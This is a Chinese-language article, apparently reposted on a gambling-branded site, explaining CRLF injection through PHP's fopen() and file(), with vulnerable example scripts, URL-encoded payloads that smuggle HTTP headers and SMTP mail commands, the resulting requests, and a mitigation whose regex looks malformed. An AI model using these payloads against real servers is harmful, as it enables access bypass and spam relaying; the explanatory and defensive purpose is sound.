奥门美高梅app-最新网址

.CRLF Injection 攻击

发布时间:2012-12-25 09:26:23 | 编辑:stu1

2010-11-06 firstonline 点击:[ 23]

本文由 firstonline 于2007 4月 10 at 3:21pm 发表,已被阅读 20202 次
PHP 的 fopen(), file() 及其它函数存在一个缺陷,即用户随意地添加额外HTTP报头信息到HTTP请求数据包中。攻击者可以利用此缺陷绕过服务器的安全限制,进行非法访问。在某些情况下,这个缺陷甚至可以打开任意的网络连接,在代理端实行PHP脚本和打开邮件转发。

PHP有一些函数用文件名(如:fopen(), file()等)作为它们的参数。如果在php.ini中allow_url_fopen被设置为打开的,这些函数也允许以接受URL来替代接收文件,并且用正确的协议连接到服务器。那么这些函数将很容易遭到 CRLF Injection 攻击。


1)大家开始一个简单的攻击。下面这段PHP代码被保存并取名为snippet.php:

以下内容为程序代码:


<?php

echo '<pre>';

print_r(file("http://www.site1.st/api?sunnan=$sunnan&vind=$vind");

echo '</pre>';

?>

 

如果攻击者这样发送:
以下内容为程序代码:


snippet.php?sunnan=visby&vind=gotland%20HTTP
/1.0%0D%0AHost%3A%20www.site2.st%0D%0AUser-A
gent%3A%20Ulf/0.0%0D%0AReferer%3A%20http%3A
%2F%2Fwww.gnuheter.org%2F%0D%0ACookie%3A%20u
ser%3Dulf%0D%0A%0D%0A


 

(必须在一行上)

这个 HTTP 请求将被发送给 www.site1.st:
以下内容为程序代码:


GET /api?sunnan=visby&vind=gotland HTTP/1.0
Host: www.site2.st
User-Agent: Ulf/0.0
Referer: http://www.gnuheter.org/
Cookie: user=ulf

HTTP/1.0
Host: www.site1.st
User-Agent: PHP/4.1.2


 

你可以看到,真实的PHP头信息被正确发送,但被服务器忽略了,因为在它们指向的报头结束之前大家发送两个CRLF。

利用此缺陷,攻击者能够任意添加用户代理(user agent),referers 和 cookies。如果站点1和站点2是同一台服务器上的虚拟主机,即使snippet.php有限制,攻击者也能绕过其限制非法访问站点2。

2) 如果PHP脚本是精心构建的,像下面这个叫 dotcom.php 的脚本:
以下内容为程序代码:


<?php

$fp = fopen($url, 'r');
fpassthru($fp);

?>

 


将能连接到任意的端口,并发送任意指令,在代理端实行PHP脚本和打开邮件转发。

如果攻击者这样发送:

以下内容为程序代码:


dotcom.php?url=http%3A%2F%2Fmail.site1
.st%3A25%2F+HTTP/1.0%0D%0AHELO+my.own.
machine%0D%0AMAIL+FROM%3A%3Cme%40my.ow
n.machine%3E%0D%0ARCPT+TO%3A%3Cinfo%40s
ite1.st%3E%0D%0ADATA%0D%0Ai+will+never+
say+the+word+PROCRASTINATE+again%0D%0A.
%0D%0AQUIT%0D%0A%0D%0A

 


(必须在一行上)

PHP 说明器将连接到 mail.site1.st:25,并且发送下面的指令:

以下内容为程序代码:


GET / HTTP/1.0
HELO my.own.machine
MAIL FROM:<me@my.own.machine>
RCPT TO:<info@site1.st>
DATA
i will never say the word PROCRASTINATE again
.
QUIT

HTTP/1.0
Host: mail.site1.st:25
User-Agent: PHP/4.1.2

Both PHP and the MTA will complain, but the mail is still sent.


 


临时解决方案 :

* 通过在PHP脚本中嵌入如下指令,确保所有这种类型的URL变量在使用时已被清空:


以下内容为程序代码:

$var = preg_replace('/\\s+/', ', $var);
 


* 如果你的脚本不需要访问URLs,建议在php.ini中关闭allow_url_fopen 。
 

上一条:关于防御U盘病毒的安全建议 下一条:跨站&#083;cript攻击和防范

关闭

 
 
 

 

XML 地图 | Sitemap 地图